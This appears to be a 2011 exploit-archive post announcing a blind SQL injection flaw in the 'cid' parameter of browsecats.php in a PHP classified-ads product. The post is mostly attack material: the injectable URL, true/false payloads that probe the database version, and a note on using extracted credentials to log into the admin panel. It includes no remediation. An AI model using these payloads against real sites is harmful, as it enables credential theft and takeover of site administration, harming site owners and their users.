PHP Classified ads software (cid) Blind SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Classified ads software (cid) Blind SQL Injection Vulnerability
# Published : 2011-01-28
# Author : BorN To K!LL
# Previous Title : PHPDirector Game Edition (game.php) SQL Injection Vulnerability
# Next Title : AB WEB CMS V.1.35 Multiple Remote Vulnerabilities

==
[-]Author: BorN To K!LL - h4ck3r
[-]Contact: SQL@hotmail.co.uk
==
[-]Script: PHP Classified ads software
[-]Version: n/a
[-]Link: http://www.softbizsolutions.com/classified-ads-software.php
==
[-]3xploit:
[path]/browsecats.php?cid=[Blind-Injection]

[-]3xample:
[path]/browsecats.php?cid=2 and substring(version(),1,1)=4         // false ,,
[path]/browsecats.php?cid=2 and substring(version(),1,1)=5         // true ,,

[-]Note:
after getting the username and the password you can login to admin panel
[path]/admin
==
[-]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"